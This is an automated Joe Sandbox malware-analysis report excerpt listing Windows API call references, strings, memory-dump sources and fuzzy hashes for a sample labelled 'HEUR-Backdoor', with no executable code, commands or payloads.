                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                • String ID:
                                                • API String ID: 1247370737-0
                                                • Opcode ID: 4c35439f09564c0ddbdc7f3b87a1428cbba69f7777353f123f301096b12a9eba
                                                • Instruction ID: 08dab8fe2ea49d074da747fcd4d6165bea41068a2945a6e8373810f1fcb31dc2
                                                • Opcode Fuzzy Hash: 4c35439f09564c0ddbdc7f3b87a1428cbba69f7777353f123f301096b12a9eba
                                                • Instruction Fuzzy Hash: 3C4127B1408346AFC350DF65C88496BFBF8FB88714F004E2EF59692650E778E588CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007FF5A2,?,00000000,?,00000000,00000000), ref: 007FEE6F
                                                • __fassign.LIBCMT ref: 007FEEEA
                                                • __fassign.LIBCMT ref: 007FEF05
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 007FEF2B
                                                • WriteFile.KERNEL32(?,?,00000000,007FF5A2,00000000,?,?,?,?,?,?,?,?,?,007FF5A2,?), ref: 007FEF4A
                                                • WriteFile.KERNEL32(?,?,00000001,007FF5A2,00000000,?,?,?,?,?,?,?,?,?,007FF5A2,?), ref: 007FEF83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: f7141929c4ca7c3add651b5d299564ce60f1de9755c257dafd19d3a5c3ddfd7d
                                                • Instruction ID: 1aa3a7a2fbdce92cee0a3d073c13648e20464d3e4fa865131ba0b14ae448ba96
                                                • Opcode Fuzzy Hash: f7141929c4ca7c3add651b5d299564ce60f1de9755c257dafd19d3a5c3ddfd7d
                                                • Instruction Fuzzy Hash: 77519171A002499FDB10CFA8D845AFEBBF9FF09310F24451AEA55E73A1E7749A41CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetTempPathW.KERNEL32(00000800,?), ref: 007EC54A
                                                • _swprintf.LIBCMT ref: 007EC57E
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • SetDlgItemTextW.USER32(?,00000066,0081946A), ref: 007EC59E
                                                • _wcschr.LIBVCRUNTIME ref: 007EC5D1
                                                • EndDialog.USER32(?,00000001), ref: 007EC6B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                • String ID: %s%s%u
                                                • API String ID: 2892007947-1360425832
                                                • Opcode ID: 89f30ba714d0773264453fddbffc20a82989496a230e07cd74d9510f025664f8
                                                • Instruction ID: 6a61016996057de8e24358c0509680a7a96d2b3d5763af714a7ec170c4dbe9d1
                                                • Opcode Fuzzy Hash: 89f30ba714d0773264453fddbffc20a82989496a230e07cd74d9510f025664f8
                                                • Instruction Fuzzy Hash: DA41C075D00658EADB26DBA1DC49EEA77BCFF08301F0080A2E509E61A0E7799BC5CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 007E8F38
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 007E8F59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AllocByteCharGlobalMultiWide
                                                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                • API String ID: 3286310052-4209811716
                                                • Opcode ID: e8a3f964eb265bf52622c0073efff4f186c5149231db063959c835ec359803c8
                                                • Instruction ID: 6b2988034e050466898999469ef290da041d2276c1fcf0f155c785a8a753931b
                                                • Opcode Fuzzy Hash: e8a3f964eb265bf52622c0073efff4f186c5149231db063959c835ec359803c8
                                                • Instruction Fuzzy Hash: 14316A31149345ABD724BB359C0AFAF7758EF89720F040109FA15A62C1EF6C9A08C3A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(?,00000000), ref: 007E964E
                                                • GetWindowRect.USER32(?,00000000), ref: 007E9693
                                                • ShowWindow.USER32(?,00000005,00000000), ref: 007E972A
                                                • SetWindowTextW.USER32(?,00000000), ref: 007E9732
                                                • ShowWindow.USER32(00000000,00000005), ref: 007E9748
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Window$Show$RectText
                                                • String ID: RarHtmlClassName
                                                • API String ID: 3937224194-1658105358
                                                • Opcode ID: eb17cfc06598378d5e8c18fff0761744030d9dfb7ab931e6b6357e1eb36f6060
                                                • Instruction ID: 21ce83feca6f74afaf3e4adc1d61aa8f66964d9acb964f1f2ff6f62b1000bad7
                                                • Opcode Fuzzy Hash: eb17cfc06598378d5e8c18fff0761744030d9dfb7ab931e6b6357e1eb36f6060
                                                • Instruction Fuzzy Hash: A531AE32005254EFCB119F65DD4CB6F7BA8FF88711F004959FE499A262DB38E948CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007FBF79: _free.LIBCMT ref: 007FBFA2
                                                • _free.LIBCMT ref: 007FC003
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007FC00E
                                                • _free.LIBCMT ref: 007FC019
                                                • _free.LIBCMT ref: 007FC06D
                                                • _free.LIBCMT ref: 007FC078
                                                • _free.LIBCMT ref: 007FC083
                                                • _free.LIBCMT ref: 007FC08E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                • Instruction ID: 49788e69e311e2691ccfb5f821a16bea5decc9edbdba77fd9e1eb334483f7a00
                                                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                • Instruction Fuzzy Hash: EB113D72550B0DFAD660BBB0CC0BFEBB7DD7F00700F408855B39966652DB69F9048A91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,007F20C1,007EFB12), ref: 007F20D8
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007F20E6
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F20FF
                                                • SetLastError.KERNEL32(00000000,?,007F20C1,007EFB12), ref: 007F2151
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: d9923e0977f631af3f69ce3c26938d650bf4e02ca6dd56272b493408c79d0008
                                                • Instruction ID: a3991e97ba63e03eadf51ab86fb13d4a44f1b8b2e59e1bebee2e77b8ecc5f05a
                                                • Opcode Fuzzy Hash: d9923e0977f631af3f69ce3c26938d650bf4e02ca6dd56272b493408c79d0008
                                                • Instruction Fuzzy Hash: E701883210D71DAEF7946BB5BC895372A48FF217747210B29F320553E2FF5A4C069148
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                • API String ID: 0-1718035505
                                                • Opcode ID: d1c96a595ac60b8697f718be2764bc496d2dffc5965395f98067c9c9b2aaf538
                                                • Instruction ID: 1ca08d5c079f26b1f85a3748cc4f95f173ecbceb522482788647eca28d8f8a9e
                                                • Opcode Fuzzy Hash: d1c96a595ac60b8697f718be2764bc496d2dffc5965395f98067c9c9b2aaf538
                                                • Instruction Fuzzy Hash: D7012661343B625F8FB05F765C902E61398FB89392330252AE541D3350DA99CC42DAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0D0D
                                                  • Part of subcall function 007DACF5: GetVersionExW.KERNEL32(?), ref: 007DAD1A
                                                • LocalFileTimeToFileTime.KERNEL32(?,007E0CB8), ref: 007E0D31
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007E0D47
                                                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 007E0D56
                                                • SystemTimeToFileTime.KERNEL32(?,007E0CB8), ref: 007E0D64
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0D72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Time$File$System$Local$SpecificVersion
                                                • String ID:
                                                • API String ID: 2092733347-0
                                                • Opcode ID: fc2be0522ba82e480598388e321b34f46c308d73984b7e2deca78bdc98604f79
                                                • Instruction ID: 90485e1b606c641eaf247fe32a040a72494fe6b35342c4a7addb0682251dafe8
                                                • Opcode Fuzzy Hash: fc2be0522ba82e480598388e321b34f46c308d73984b7e2deca78bdc98604f79
                                                • Instruction Fuzzy Hash: 7D31E97A90024AEBCB10DFE5C8859EFBBBCFF58700B04456AE955E3610E7349685CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: 9a1533fb23bb72916b487e59294fa431163067f53b9725c31ec73ed71bfcd89d
                                                • Instruction ID: 12b59da4de65c9a947f552636804386589f22faa93fee948e89820191c0c35b1
                                                • Opcode Fuzzy Hash: 9a1533fb23bb72916b487e59294fa431163067f53b9725c31ec73ed71bfcd89d
                                                • Instruction Fuzzy Hash: 2921B27360124EBBDB049E12CC81E7BB7ADFB59784B148128FE09DB345E278ED5186A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,00810EE8,007F3E14,00810EE8,?,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F8FA9
                                                • _free.LIBCMT ref: 007F8FDC
                                                • _free.LIBCMT ref: 007F9004
                                                • SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F9011
                                                • SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F901D
                                                • _abort.LIBCMT ref: 007F9023
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 17de80597e6d935ca28f81532a3b49328a55927adbf8ee6601dcea3c65304ef3
                                                • Instruction ID: e72f784443388db63a3126a6f82fe8e6a65ce3a924544f0dadbdcea4b72ea98e
                                                • Opcode Fuzzy Hash: 17de80597e6d935ca28f81532a3b49328a55927adbf8ee6601dcea3c65304ef3
                                                • Instruction Fuzzy Hash: DAF0F436505A09EBC7E133246C0EB3B295AABD1770F240114F724D2392EE2C89025416
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 007ED2F2
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007ED30C
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007ED31D
                                                • TranslateMessage.USER32(?), ref: 007ED327
                                                • DispatchMessageW.USER32(?), ref: 007ED331
                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 007ED33C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 2148572870-0
                                                • Opcode ID: 5430a53c7a7932a029180c17bb3b27477ea578cab04cf35e42d393d4c781c07b
                                                • Instruction ID: 320d21c6393994b79cbdb6b5fbf1ca56afb0c5eb9b6d6ad0eacc468129d26021
                                                • Instruction Fuzzy Hash: 0FF03C72A02519ABCB206BA2DC4CEDBBF6DFF96391F008412F606D2010D6388945CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _wcschr.LIBVCRUNTIME ref: 007EC435
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                Strings
                                                Similarity
                                                • API ID: CompareString_wcschr
                                                • String ID: <$HIDE$MAX$MIN
                                                • API String ID: 2548945186-3358265660
                                                • Opcode ID: 432cde1fea814ffe382b128f79fd4047c004b06d89ee2fab21e045d8ccc55e63
                                                • Instruction ID: df32b045ab1ce0ff8be6731e0bd763cf0389222fd1710a8e38318d8f250bcb88
                                                • Instruction Fuzzy Hash: 1331967690128DAADF26DA56CC45EEF77BCEB19700F004066FA05D6190EBB89FC5CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadBitmapW.USER32(00000065), ref: 007EADFD
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 007EAE22
                                                • DeleteObject.GDI32(00000000), ref: 007EAE54
                                                • DeleteObject.GDI32(00000000), ref: 007EAE77
                                                  • Part of subcall function 007E9E1C: FindResourceW.KERNEL32(007EAE4D,PNG,?,?,?,007EAE4D,00000066), ref: 007E9E2E
                                                  • Part of subcall function 007E9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,007EAE4D,00000066), ref: 007E9E46
                                                  • Part of subcall function 007E9E1C: LoadResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E59
                                                  • Part of subcall function 007E9E1C: LockResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E64
                                                Strings
                                                Similarity
                                                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                • String ID: ]
                                                • API String ID: 142272564-3352871620
                                                • Opcode ID: a512763a23251290438f05ff499f449fa77478ee25db4951833dab1ad9142d4d
                                                • Instruction ID: c08ed9ffc8f7ff452577c713b0d0edceed1e11639f8c478c055a0cdd2f61f8a1
                                                • Instruction Fuzzy Hash: F00126335426A5F7C710A7669C1BABF7B79AFC9B41F080014FE00A7291DB398C1586B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • EndDialog.USER32(?,00000001), ref: 007ECCDB
                                                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 007ECCF1
                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 007ECD05
                                                • SetDlgItemTextW.USER32(?,00000068), ref: 007ECD14
                                                Strings
                                                Similarity
                                                • API ID: ItemText$DialogWindow
                                                • String ID: RENAMEDLG
                                                • API String ID: 445417207-3299779563
                                                • Opcode ID: dc977c5e3a5354f143f0d918298d10908074077820c36b9b4beec4a47c22b622
                                                • Instruction ID: def07a5466a7479fbbc382aa11a3c8caea29340420a9c92f18f5ad125a87909d
                                                • Instruction Fuzzy Hash: 3A012832386350BAD1229F659D09FAB3B6CFB9E742F204411F345A21E0C66AA9168B75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F7573,00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002), ref: 007F75E2
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F75F5
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,007F7573,00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002), ref: 007F7618
                                                Strings
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 5517d1792a7c8690e3a871e7c5b98a2859e70b7c157f7fe5b375047ab56d3f71
                                                • Instruction ID: a7eff8e53f208c0088268a496a489d1cdd1f188418c3f98371fa38ab2df6513e
                                                • Instruction Fuzzy Hash: 62F0313060961DBBDB559B55DC09AAEBBB9FF04712F104058F805E2260DF788A40CA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
                                                  • Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2
                                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007DEB92
                                                • GetProcAddress.KERNEL32(008181C0,CryptUnprotectMemory), ref: 007DEBA2
                                                Strings
                                                Similarity
                                                • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                • API String ID: 2141747552-1753850145
                                                • Opcode ID: be9745f881d4101f5a6f4e6a523cdc7c2c51763e720d4fb81f4c9565982cbeb5
                                                • Instruction ID: a45557ffd764026e721244ba2cd92b9bfa82457b9ce2a0de27d23a329d06e303
                                                • Instruction Fuzzy Hash: 79E04F70401741AEDB629F399D08B42BEE8BF15704F00881EE4E6D7380D6F8D5808B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: bc9335ea65a5bd02cfbc64b0614dd28500ab9fccc793db824fe54762f8e54279
